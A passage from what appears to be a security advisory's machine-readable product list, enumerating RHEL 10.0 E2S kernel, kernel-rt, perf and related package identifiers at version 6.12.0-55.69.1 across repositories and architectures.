"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
